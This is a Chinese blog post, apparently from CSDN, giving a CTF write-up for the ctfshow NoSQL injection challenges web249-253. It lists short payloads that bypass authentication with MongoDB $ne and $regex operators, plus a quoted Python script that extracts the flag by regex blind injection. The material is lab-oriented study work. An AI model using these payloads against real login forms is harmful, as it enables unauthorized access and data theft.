CTFSHOW_SQL注入web249-253

最新推荐文章于 2023-05-15 15:28:55 发布
最新推荐文章于 2023-05-15 15:28:55 发布
阅读量232 收藏
点赞数 1
分类专栏: CTF 文章标签: sql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46241655/article/details/126431532
版权

试了其他文章的payload,没用成功,自己就写下来吧。
做题有三点注意,url编码,加不加8080(有的脚本url里面加8080,如果不行就去掉,行就不管),用不用Burpsuite的Repeater(有的信息要用Repeater才能看见)

web249

/api/?id[]=flag&page=1&limit=10

一些文章的payload少了page=1&limit=10

web250

我用username[$ne]=1&password[$ne]=1失败了,下面这个可以

username[$ne]=1&password[$regex]=ct

web251

username[$ne]=1&password[$regex]={

web252

username[$ne]=1&password[$regex]={

web253

用yu师傅的脚本就行

#author:yu22x
import requests
url="http://23fde3ab-6f1e-45f0-a918-576d3ac9525b.challenge.ctf.show/api/index.php"
flag="ctfshow{"
s='0123456789abcdef-}'
for i in range(9,46):
    print(i)
    for j in s:
        data={
            'username[$ne]':'1',
            'password[$regex]':f'^{flag+j}'
        }
        r=requests.post(url=url,data=data)
        if r"\u767b\u9646\u6210\u529f" in r.text:
            flag+=j
            print(flag)
            if j=="}":
                exit()
            break
专注pwn0年
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB ---- ctfshow ----- SQL注入
L0g1c的博客
06-24 414
看题目 //拼接sql语句查找指定ID用户我们能够控制的只有的值,经分析,条件为不为 flag。可是只有用户名为 flag 才能输出 正确的flag。第一步先判断是否有注入点。观察到存在单引号,所以要考虑引号闭合问题。 输入的内容被当作代码执行 逻辑词 or 只要任意一个条件为真就算成立所以输入,可以列出所有的记录(数据)本来抱着测试注入点,不小心把 flag 测出来了,嘻嘻。正规做一下这个题,要想绕过 ,仔细观察得到与 id 使用逻辑运算符 相连,所以使得 id 与一个不存在的数相等,就可以绕过 打开题
ctfshow SQL注入专题
yink12138的博客
11-07 938
更新中的SQL注入教程
CTFshow 反序列化 web254
Kradress的博客
12-19 244
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
ctfshow web入门 sql注入(超详解)201-250
qq_50589021的博客
08-23 4444
web201 查询语句 //拼接sql语句查找指定ID用户 $sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';"; 返回逻辑 //对传入的参数进行了过滤 function waf($str){ //代码过于简单,不宜展示 } 需要学会: 使用--user-agent 指定agent --user-agent="Mozilla/5
ctfshow---sql注入(214-253)
fainpo的博客
05-15 2630
时间盲注了打开页面什么都没有,抓包也什么都没有,抓一下这个原始页面的包可以看到里面有参数将debug修改成1后可以看到有返回的内容既然说是时间盲注那么直接将ip修改成sleep(3) 成功延时三秒后显示内容。
SQL.rar_sql injection_sql 注入_sql注入
09-14
sql注入测试程序 sql injection expoit code
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
web_scan_code.zip_python_sql injection_sql注入_web scan_webscan
07-15
实现对网页的试错,判断后台数据库类型以及是否存在SQL注入的可能
SQL_zhuru.rar_sql 注入_sql注入
09-24
sql注入 很多关于sql注入 的工具
SQL-injection-detective.rar_Detective_sql injection_sql 注入_sql注入
09-23
利用C#实现的简单sql注入漏洞检测,欢迎大家下载
CTFSHOW SQL注入篇(231-253)
羽的博客
06-11 1747
CTFSHOW SQL注入
渗透学习-CTF篇-web-CTFshow(仅有部分,持续更新中,254-259关))
qq_43696276的博客
03-20 1108
本文将主要介绍CTFshow的关卡攻略,至于基本的原理请参考本人的其他介绍漏洞原理的博客。
ctfshow-WEB入门-命令执行 (WEB29~WEB44)
weixin_40103894的博客
11-28 608
ctfshow-WEB入门-命令执行 (WEB29~WEB44)
2022d3CTF 部分web题基础知识学习
weixin_51458899的博客
03-23 4082
[d3ctf2020]shorter rome1.0反序列化链调试见上面(第三周标题为[d3ctf2020]的内容) 当时参考的资料: ROME反序列化分析 (c014.cn) javassist使用全解析 - rickiyang - 博客园 (cnblogs.com) https://xz.aliyun.com/t/6787#toc-8 (java反射入门) https://developer.huawei.com/consumer/cn/forum/topic/020447303398723010
CTFSHOW-sql注入
Yb_140的博客
08-13 2428
web171 最简单的sql注入,先演示基本操作 payload: -1' union select 1,2,database() --+ //得到数据库名为ctfshow_web -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web' --+ //得到数据表名为ctfshow_user -1' union select
ctf.show的SQL注入(web171-web253)
wanan的博客
09-30 6482
ctf.show的SQL注入(web171-web253)
Nosql 注入从零到一
jklbnm12的博客
09-22 2318
Nosql 注入的简介 NoSQL 注入由于 NoSQL 本身的特性和传统的 SQL 注入有所区别。使用传统的SQL注入,攻击者利用不安全的用户输入来修改或替换应用程序发送到数据库引擎的 SQL 查询语句(或其他SQL语句)。 换句话说,SQL 注入使攻击者可以在数据库中 SQL 执行命令。 与关系数据库不同,NoSQL 数据库不使用通用查询语言。NoSQL 查询语法是特定于产品的,查询是使用应用程序的编程语言编写的:PHP,JavaScript,Python,Java 等。这意味着成功的注入使攻击者不仅可
Mongodb注入攻击
weixin_33881753的博客
03-08 2148
Th1nk · 2014/11/19 11:390x00 前言关于mongodb的基本安装运行操作以及php操作mongodb,请参考我以前的文章php下操作mongodb的帖子国内已经有了,但是基于php下注入攻击mongodb的文章似乎还比较少。本文是笔者在学习、查阅了大量资料后的一些总结,文中涉及的攻击手法及其知识产权全部归原作者所有,我只是大自然的搬运工。未征得笔者同意,请勿转载。0x01...
ctfshow web入门 web57
lonmar的博客
11-24 1117
文章目录0x010x020x03 看wp分析一波 只要凑出36即可 0x01 shell中各种括号()、(())、[]、[[]]、{}的作用和区别 : https://blog.csdn.net/qq_46091464/article/details/108563368 ${_}:代表上一次命令执行的结果 $(()): 做运算 0x02 之前没有命令返回或者执行,结果应该是空,与""等价 又 $((""))值为0,$((~$((""))))值为-1,再做拼接: 所以可以拼接得到-37 , -37
ctfshow web sql
最新发布
08-23
因此,可以得出结论,ctfshow web sql竞赛是一个围绕web安全中的SQL注入漏洞进行的CTF竞赛。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* *2* *3* ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值